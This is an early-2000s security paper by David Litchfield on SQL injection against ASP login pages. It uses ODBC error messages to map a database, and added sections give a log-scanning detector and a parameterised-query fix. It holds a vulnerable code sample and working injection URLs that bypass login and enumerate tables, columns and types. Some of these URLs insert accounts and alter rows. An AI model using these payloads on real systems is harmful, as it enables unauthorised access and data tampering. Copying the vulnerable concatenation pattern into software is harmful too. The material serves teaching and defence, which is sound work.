Web Application Disassembly With ODBC Error Messages: by David Litchfield Director of Security Architecture @stake

The document describes how to disassemble a web application to bypass login authentication and extract database information using ODBC error messages. An attacker can enumerate the database table structure, column names, and data types by making requests that trigger unique error messages. This allows inserting arbitrary records to create a new account, bypassing the intended login process. With the table and column details, an attacker can then extract, modify or delete sensitive data from the database.

Web Application Disassembly with ODBC Error Messages

By David Litchfield, Director of Security Architecture, @stake
http://www.atstake.com

Introduction

This document describes how to subvert the security of a Microsoft Internet Information Web Server that feeds into a SQL database. The document assumes that the web application uses Active Server Pages technology with Active Data Objects (ADO), though the same techniques can be used with other technologies. The techniques discussed here can be used to disassemble the SQL database's structure, by-pass login pages, and retrieve and modify data. This does assume that attackers can run arbitrary SQL queries, which unfortunately is all too common due to a lack of understanding, or even a complete ignorance, of this problem and of the coding techniques needed to avoid it in an ASP page. For example, consider the following ASP code from a login page:

<%@ LANGUAGE="VBSCRIPT" %>
<%
Dim oConn, oRS
Set oConn = Server.CreateObject("ADODB.Connection")
oConn.Open "DRIVER={SQL Server};SERVER=aeneas;UID=sa;PWD=;DATABASE=paper"
Set oRS = oConn.Execute("SELECT * FROM tblUsers WHERE username = '" & Request.Querystring("UserID") & "' AND password = '" & Request.Querystring("Password") & "'")
if not oRS.EOF then
    Session("UserID") = oRS("username")
    Response.Redirect "loginsucceeded.asp"
else
    Response.Redirect "loginfailed.asp"
end if
%>

There are several problems with this page, but before getting to those, examine how it works. The client enters a user ID and password, which are passed into an SQL query, which is then executed. If the user ID and password exist in tblUsers, the SQL server's response, known as a recordset, would be populated. If the user ID and/or password do not exist then the recordset would not be populated. The ASP code then checks to see whether it has been populated: if so, it redirects the user to loginsucceeded.asp, and if the recordset has not been populated the user is redirected to loginfailed.asp.

As was already stated, there are several problems with this ASP page. There is an SQL login and password embedded in the code; that SQL login happens to be the most powerful account in the database, and its password is still the default blank. As far as the coding is concerned, though, it is extremely dangerous: because the user-supplied ID and password are passed straight into the SQL query without first being sanitised, an attacker can bypass this login page. All she would need to do is populate the recordset, and to do this without knowing a valid user ID and password she makes the following request:

http://server/login.asp?userid='%20or%201=1--

Rather than executing the SQL query the server was supposed to, i.e.

SELECT * FROM tblUsers WHERE username = 'foo' AND password = 'bar'

it executed

SELECT * FROM tblUsers WHERE username = '' or 1=1--

Due to the "or" condition in this query always evaluating to true, the recordset would be populated and the attacker would be logged in. The reason that the SQL query has been so drastically modified is the single quote mark in the parameter: in SQL queries, strings are delimited by single quotes. Tacking a -- onto the end of the query stops SQL complaining about unclosed quote marks. This page is easy to by-pass using this "or" technique.

Extended Introduction

If this code were modified, however, such that an UPDATE occurred afterwards to set, say, audit information, this "or" technique would fail:

<%
Dim oConn, oRS
Set oConn = Server.CreateObject("ADODB.Connection")
oConn.Open "DRIVER={SQL Server};SERVER=aeneas;UID=sa;PWD=;DATABASE=paper"
Set oRS = oConn.Execute("SELECT * FROM tblUsers WHERE username = '" & Request.Querystring("UserID") & "' AND password = '" & Request.Querystring("Password") & "'")
if not oRS.EOF then
    Session("UserID") = oRS("username")
    Set oRS = oConn.Execute("exec sp_audit '" & Request.Querystring("UserID") & "'")
    Response.Redirect "loginsucceeded.asp"
else
    Response.Redirect "loginfailed.asp"
end if
%>

As can be seen, the code now has an "exec sp_audit" query, so when the same request is made using the "or" technique the server produces an error:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword 'or'. /login.asp, line 11

The reason this error occurs is that SQL queries that execute a stored procedure can't be conditional, and the presence of "or" makes it so. At this point the login has failed. Assuming the attacker does not have access to the source of the ASP code, how can this login screen be by-passed?

Down to business

To do this the web application needs to be disassembled, and this is done by using ODBC error messages.
The attacker would start by requesting

http://127.0.0.1/login.asp?userid=aaa'

Note the single quote at the end of this URL. This will produce the following error message:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ' ' AND password = ''. /login.asp, line 3

What this has done is given the attacker a fragment of the query embedded in the ASP page: " AND password =". This also informs the attacker that one of the columns in the table is called "password". With knowledge of this it is now possible to enumerate the structure of the table where the user credentials are stored, learning its name and the name of every column in that table. They would do this by making the following request:

http://127.0.0.1/login.asp?userid=ddd'%20group%20by%20(password)--

This would produce the following error message:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'tblUsers.username' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. /login.asp, line 3

As can be seen, the attacker now has the table's name, tblUsers, and the name of another column in this table, username. They would then request

http://127.0.0.1/login.asp?userid=aaa'%20group%20by%20(username)--

producing

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'tblUsers.lastloggedin' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. /login.asp, line 3

Now the attacker has a third column name. They would keep repeating this process of substituting column names in a "group by" URL to step through the table, enumerating all of the columns. But when would they know that all column names have been successfully enumerated? Assuming that the ASP code performs a "SELECT * ...", then by using UNION the attacker could work out the number of columns in the tblUsers table:

http://127.0.0.1/login.asp?userid=aaa'%20union%20select%20username%20from%20tblusers--

This request would produce this error:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists. /login.asp, line 3

The attacker would then keep adding another username to the URL

http://127.0.0.1/login.asp?userid=aaa'%20union%20select%20username,username%20from%20tblusers--

until this error message stopped. At this point, counting the number of usernames in the request would give the number of columns that exist in the tblUsers table.

Once a list of all the column names has been retrieved, the attacker would then need to work out what data type each column expected. To do this the COMPUTE clause would be used, providing each column name as an argument:

http://127.0.0.1/login.asp?userid=aaa'%20compute%20sum(username)--

producing the error

Microsoft OLE DB Provider for ODBC Drivers error '80040e03'
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a nvarchar data type as an argument. /login.asp, line 3

As can be seen, "username" is of data type nvarchar. Once this has been performed, the attacker would know the name of the table, the name of each column in the table, and their respective expected data types. These three details are crucial if the attacker wishes to INSERT into or UPDATE the table, and to by-pass the login page they will be needed. The attacker would then set about creating their own account using an INSERT query:

http://127.0.0.1/login.asp?userid=aaa' insert into tblusers(username,password,lastloggedin,status) values ('jsmith','secret','Oct 31 2000 9:52PM','foo')--

Requesting this would not produce an error. To see if it was successful, however, the attacker would just attempt to log on with a username of "jsmith" and a password of "secret". They may be successful. However, imagine that they received a message stating that their account was locked out. Notice in the above URL (%20s stripped out for clarity's sake) that one of the columns is called "status", and the value "foo" was inserted. It would be a fair assumption to say that if the account were locked out, this "status" column would hold the information about this. The attacker would need to set this value to what the application expects for it to consider the account not locked out. But how would the attacker know what to insert in this field? They wouldn't, but if they could update it with another user's value then this should give the application what it expects for the account not to be locked out. The difficulty with this is retrieving a result set with only one row.

This can be done, however, using aggregate functions: MIN and MAX. A request would be made similar to

http://127.0.0.1/login.asp?userid=aaa' UPDATE tblusers SET status = (select min(status) from tblusers) where username = 'jsmith'

This query would produce one row in the recordset and update jsmith's "status" with the row that on evaluation produced the smallest value. All going according to plan, the attacker has now by-passed the login page.

Summary

Obviously the techniques described here could be used not just for by-passing login pages but also for enumerating the database tables so that data could be returned with a query using the UNION operator: they bypass the issue that calling a "select * from sysobjects" as a second query would not have the results returned in the recordset and printed back to the client's screen.

The fix

All of this would "go away" if the ASP coder properly sanitised user input before letting it anywhere near an SQL query. Depending upon whether the input is a string or a number, different methods are used.
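Before the coding fix itself, the disassembly steps above seen from the server's side: an added example, not part of the paper, that scans constructed IIS-style log lines for the request shapes the paper walks through (trailing quote, GROUP BY, UNION SELECT, COMPUTE SUM, stacked statement, "or" tautology, -- terminator). The log field layout and the client addresses are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS-style log lines: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status.
# The query strings mirror the requests in the paper; addresses and timestamps are made up.
SAMPLE_LOG = """\
2001-01-15 09:52:01 10.0.0.5 GET /login.asp userid=jsmith&password=secret 302
2001-01-15 09:52:07 10.0.0.9 GET /login.asp userid=aaa' 500
2001-01-15 09:52:12 10.0.0.9 GET /login.asp userid=ddd'%20group%20by%20(password)-- 500
2001-01-15 09:52:19 10.0.0.9 GET /login.asp userid=aaa'%20union%20select%20username,username%20from%20tblusers-- 500
2001-01-15 09:52:25 10.0.0.9 GET /login.asp userid=aaa'%20compute%20sum(username)-- 500
2001-01-15 09:52:40 10.0.0.5 GET /login.asp userid=O'Malley&password=x 302
"""

# One rule per step of the disassembly, applied to the URL-decoded query string.
RULES = [
    ("probe: trailing unclosed quote",   re.compile(r"'\s*$")),
    ("column enumeration: ' GROUP BY",    re.compile(r"'\s*group\s+by\b", re.I)),
    ("column counting: ' UNION SELECT",   re.compile(r"'\s*union\s+select\b", re.I)),
    ("type discovery: ' COMPUTE SUM/AVG", re.compile(r"'\s*compute\s+(sum|avg)\s*\(", re.I)),
    ("stacked INSERT/UPDATE/EXEC",        re.compile(r"'\s*(insert|update|delete|exec)\b", re.I)),
    ("tautology: ' OR",                   re.compile(r"'\s*or\b", re.I)),
    ("comment terminator --",             re.compile(r"--\s*$")),
]

def classify_query(query):
    """Names of every rule the decoded query string matches (empty list for clean input)."""
    decoded = unquote_plus(query)
    return [name for name, rx in RULES if rx.search(decoded)]

def scan_log(text):
    """Return (client_ip, uri_stem, status, hits) for each line whose query matches a rule.
    A hit on login.asp together with a 500 (the ODBC error page) is the combination to alert on."""
    findings = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 7:
            continue
        ip, stem, query, status = fields[2], fields[4], fields[5], fields[6]
        hits = classify_query(query)
        if hits:
            findings.append((ip, stem, int(status), hits))
    return findings
```

Note that the legitimate O'Malley login is not flagged: a quote on its own is not the signal, a quote followed by SQL syntax or a trailing quote answered with a 500 is.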

For strings the Replace() function can be used:

Replace(Request.Querystring("foobar"), "'", "")

This would replace each occurrence of a single quote with nothing, effectively stripping them out. In cases where there needs to be a single quote, though, say in a name like "O'Malley", or where a user wishes to have a single quote in their password, the fix would instead be

Replace(Request.Querystring("foobar"), "'", "''")

replacing a single quote with two single quotes, which is the way to escape single quotes in SQL. If the input in question is numeric then using CInt will produce an error if the input is not a number. Alternatively it is possible to use IsNumeric() or, in JScript, isNaN().
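The two Replace() variants and the numeric check above, played out against the paper's own tblUsers layout: an added example, not the paper's code, written in Python with sqlite3 standing in for SQL Server (an assumption) and extended with a parameterised query, which the paper does not discuss.

```python
import sqlite3

# Constructed stand-in for the paper's tblUsers (sqlite3 here instead of SQL Server;
# the column names are the ones the paper enumerates). Rows are made up.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE tblUsers(username TEXT, password TEXT, lastloggedin TEXT, status TEXT)")
    db.executemany("INSERT INTO tblUsers VALUES (?, ?, ?, ?)", [
        ("alice", "wonderland", "2001-01-15 09:52", "active"),
        ("O'Malley", "sh'amrock", "2001-01-15 10:01", "active"),
    ])
    return db

def strip_quotes(s):   # Replace(s, "'", "")   -- the paper's first fix
    return s.replace("'", "")

def double_quotes(s):  # Replace(s, "'", "''") -- the paper's second fix
    return s.replace("'", "''")

def login_concat(db, userid, password, escape=None):
    """The login.asp pattern: input concatenated into the SQL text.
    escape=None reproduces the vulnerable page; pass one of the Replace() equivalents above."""
    if escape is not None:
        userid, password = escape(userid), escape(password)
    sql = ("SELECT username FROM tblUsers WHERE username = '" + userid
           + "' AND password = '" + password + "'")
    return [row[0] for row in db.execute(sql)]

def login_param(db, userid, password):
    """Parameterised alternative (not in the paper): the driver binds the values,
    so a quote in the input is data, never SQL syntax."""
    cur = db.execute("SELECT username FROM tblUsers WHERE username = ? AND password = ?",
                     (userid, password))
    return [row[0] for row in cur]

def is_numeric_id(s):
    """Equivalent of the CInt / IsNumeric check for a numeric parameter."""
    try:
        int(s, 10)
        return True
    except ValueError:
        return False
```

Stripping quotes stops the "or 1=1" bypass but locks O'Malley out of his own account; doubling them, or binding parameters, does both jobs.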
